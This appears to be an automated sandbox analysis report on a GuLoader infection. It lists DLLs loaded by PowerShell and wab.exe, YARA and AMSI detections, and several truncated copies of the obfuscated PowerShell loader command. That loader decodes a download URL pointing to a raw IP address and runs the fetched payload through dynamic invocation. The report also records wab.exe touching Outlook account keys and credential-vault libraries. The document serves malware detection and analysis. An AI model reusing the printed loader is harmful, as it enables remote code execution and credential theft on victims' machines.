Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbY source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1767599813.000000000726E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbD source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrst", "0")
Yara detected GuLoader
Source: Yara match File source: 00000005.00000002.1770777282.0000000008F9F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1770345061.0000000008770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1765124979.0000000005C63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Dragen)$global:Thetarytme = [System.Text.Encoding]::ASCII.GetString($Earthshine)$global:Dampskibsforbindelsers=$Thetarytme.substring($Cafeterieejerne,$Unoccupiedness111)<#Cacodaemon
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tetrads $Ankeinstansensrbejdsdatabasernesiobrndsler $Sniggle), (Uncomplementary @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Skolebordets = [AppDomain]:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($rekvisitren)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Noncontemptuous91, $false).DefineType($Situat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Dragen)$global:Thetarytme = [System.Text.Encoding]::ASCII.GetString($Earthshine)$global:Dampskibsforbindelsers=$Thetarytme.substring($Cafeterieejerne,$Unoccupiedness111)<#Cacodaemon
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi 